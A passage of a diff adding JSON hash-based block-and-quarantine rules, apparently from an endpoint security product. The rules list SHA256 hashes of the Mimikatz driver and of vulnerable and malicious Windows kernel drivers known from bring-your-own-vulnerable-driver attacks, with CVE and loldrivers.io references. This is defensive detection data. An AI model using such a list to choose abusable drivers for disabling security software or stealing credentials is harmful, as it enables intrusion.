+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971069Z",
+ "creation_date": "2026-03-23T11:45:29.971073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3afd07a7775c13bf147b3ea25fd8fde7cce51bab90753b5af44dc2945d64d699",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a97ea3f-c467-5e68-9cc8-95d7d25bc220",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977961Z",
+ "creation_date": "2026-03-23T11:45:29.977963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae5cc99f3c61c86c7624b064fd188262e0160645c1676d231516bf4e716a22d3",
+ "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a982bd1-a4e9-5184-a840-8443a45600b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819704Z",
+ "creation_date": "2026-03-23T11:45:31.819707Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1409728d31fe9f8921a9380dd206ab61688c3a67c5b508bf5bbecf4b93bd5c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a985471-8966-5069-b6bb-bbb46f191caa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982236Z",
+ "creation_date": "2026-03-23T11:45:29.982238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982243Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a91d6e83b8fdec536580f6617f10dfc64eedf14ead29a6a644eb154426622ba",
+ "comment": "Vulnerable Kernel Driver (aka KfeCo11X64.sys) [https://www.loldrivers.io/drivers/76b5dfae-b384-45ce-8646-b2eec6b76a1e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3aa1e839-aa57-533a-979d-c2180e1a2456",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824543Z",
+ "creation_date": "2026-03-23T11:45:31.824546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c265291f7d561017b9c60e372e5f8e4e1ccf0009d288776b3e21084d3c392798",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ac571cf-513e-5a91-b099-3177cc7754e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146341Z",
+ "creation_date": "2026-03-23T11:45:32.146344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146349Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a282ba45dd3727203ba40cc8f5f79167bb2d461fe294a49557f4667db1e05658",
+ "comment": "Malicious Kernel Driver (aka driver_bfcbc010.sys) [https://www.loldrivers.io/drivers/dbfcce10-76a3-44a4-a9b8-d7126152a235/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ad8e293-1a23-5378-abdb-b81ddb0a03a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485163Z",
+ "creation_date": "2026-03-23T11:45:31.485166Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cee8e34dbc221dbb841c0f89db36e70625cebcb4002058aa0af2d34d7ac6b74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ae472ba-a480-59b5-bf71-ae3a3880b73e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609980Z",
+ "creation_date": "2026-03-23T11:45:29.609982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34f36a59ecf6174eeac15994e54c41fe1e3e3b1eee8ed4c399ec8c63212373d7",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3afbd620-96f2-5039-b74a-5a8f9b49e012",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615832Z",
+ "creation_date": "2026-03-23T11:45:29.615834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c22b7f65de948fdb74ffc3b5bae68f109bf7404a154ddbfa25dfd53e1bde667",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b03c9d7-2107-5d87-a0e3-acaa6792a378",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831802Z",
+ "creation_date": "2026-03-23T11:45:30.831804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e99507bfbaf16bc39a59e570226a898b26e2a9ce276c0a79aa4a65e7f6e2b17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b0a2646-a464-5600-9e91-ce5383bedd98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822547Z",
+ "creation_date": "2026-03-23T11:45:30.822549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00b3ac33836f15ea53e81746ffa7c2888dc3c98492b59a97ba5a0a64166900d0",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b143314-d580-56ca-bb65-5ec525d04cca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815041Z",
+ "creation_date": "2026-03-23T11:45:31.815045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6925affc3b3e3bcdc1cc92d1f816a613be9de35e28db36d4cce9481f28dbbca1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b2caa4d-43b4-5e0e-9ef5-37bc41817998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816416Z",
+ "creation_date": "2026-03-23T11:45:30.816418Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "458efd66c94cd83cbd190d72c329b6c0cec3387802db8ca3cd530a84f80ce2b8",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b3f2274-1436-5f86-9479-60c508fb399a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481767Z",
+ "creation_date": "2026-03-23T11:45:30.481769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c33314792854eef6c6cc4bd1cc4b00f1feed35e8bd260dd4ab0d93b1f6165af",
+ "comment": "Vulnerable Kernel Driver (aka cg6kwin2k.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b438020-6411-5c7b-8fa8-c8609f04a31d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148277Z",
+ "creation_date": "2026-03-23T11:45:31.148279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "157e7334c5e7655ae0c107bfde777aa5d6b0c3176f97f2994761993d418814f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b47fca2-2199-5fbf-99f4-aefd677d2164",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812240Z",
+ "creation_date": "2026-03-23T11:45:31.812242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3fc5a4b5ef0e979b1d16e4f6a2a766edfd1b9e80228bc0892db3f9e6adffc96e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b4c9874-7466-54ff-bb27-3320f948a34f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146564Z",
+ "creation_date": "2026-03-23T11:45:32.146566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6deeea6607a7da9c8b4087d1424aac6dbbe70831e93c835b5a9e4a80ae59f28",
+ "comment": "Malicious Kernel Driver (aka driver_a6deeea6.sys) [https://www.loldrivers.io/drivers/f694c0e1-b75d-4c41-acbd-a87b72d8abe4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b4dcfa9-d9ae-5aa1-8fcc-ff0fe841a1df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604355Z",
+ "creation_date": "2026-03-23T11:45:29.604357Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b",
+ "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b5495be-6a61-5fd4-b71b-4e4cd3e53830",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622616Z",
+ "creation_date": "2026-03-23T11:45:29.622618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31f4140c12ac31f5729a8de4dc051d3acd07783564604df831a2a6722c979192",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b5620ad-f93a-5301-8f1f-e37ccbc282f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152686Z",
+ "creation_date": "2026-03-23T11:45:31.152688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d2e499e573f90ae279f381b952ff76b6d43ac34855946e2a0a79bdbd4ae2165",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b5d14c4-80a1-557e-a4ac-c69502851596",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147165Z",
+ "creation_date": "2026-03-23T11:45:31.147167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e95946ab82b3992a3f89a25e6e67f08ab2d086e7ba6f2d8efff2cca76b96f407",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b61727e-27a8-5ece-995c-622986c6c3d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605174Z",
+ "creation_date": "2026-03-23T11:45:29.605176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08b1b690730707fe4c04d4a8e05e229a58ef2bb7cdf8930c6a34c7ea4983c93d",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b6a026c-042e-5646-8575-29a40078c2cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610048Z",
+ "creation_date": "2026-03-23T11:45:29.610050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
